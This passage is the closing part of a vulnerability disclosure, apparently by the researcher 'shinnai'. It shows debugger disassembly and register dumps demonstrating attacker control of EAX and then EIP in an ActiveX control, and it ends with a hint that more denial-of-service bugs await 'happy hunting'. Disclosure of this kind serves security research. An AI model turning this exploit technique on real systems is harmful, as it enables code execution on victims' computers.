PUSH EDX +1007FEBD |. 8BCE MOV ECX,ESI +1007FEBF |. C78424 DC0000 MOV DWORD PTR SS:[LOCAL.0],0 +1007FECA |. 897C24 10 MOV DWORD PTR SS:[LOCAL.51],EDI +1007FECE |. FF90 04030000 CALL DWORD PTR DS:[EAX+304] <- WE NOW ARE IN CONTROL OF EAX +1007FED4 |. 85C0 TEST EAX,EAX +... +... + +Registers +CPU - thread 9. (00000B38), module UCCVIE~1_OCX +EAX 45454545 <- THIS VALUE THAT WAS PREVIOUSLY STORED IN MEMORY, IF WE CHANGE IT IN ANOTHER VALID ADDRESS... +ECX 00030040 ASCII "EEEE" +EDX 015DD1D0 +EBX 00000000 +ESP 015DD184 +EBP 015DD300 +ESI 00030040 ASCII "EEEE" +EDI 42424242 +EIP 1007FECE UCCVIE~1_OCX.1007FECE +And... +CPU - thread 9. (00000B38) +EAX 0002FDBC +ECX 00030040 ASCII "EEEE" +EDX 015DD1D0 +EBX 00000000 +ESP 015DD180 +EBP 015DD300 +ESI 00030040 ASCII "EEEE" +EDI 42424242 +EIP 46464646 <- BINGO :) + +---------------------------------------- +---------------------------------------- + +BONUS STAGE: +There are a huge number of DoS... happy hunting :) +Peace, your friendly neighborhood shinnai. +--------------------------------------------------------------------- \ No newline at end of file